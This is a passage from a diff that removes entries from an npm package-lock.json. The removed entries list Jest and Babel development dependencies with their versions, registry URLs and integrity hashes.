"resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/node": { - "version": "20.4.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", - "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", - "dev": true - }, - "node_modules/@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "dependencies": { - "fill-range": "^7.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "node_modules/has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "dependencies": { - "function-bind": 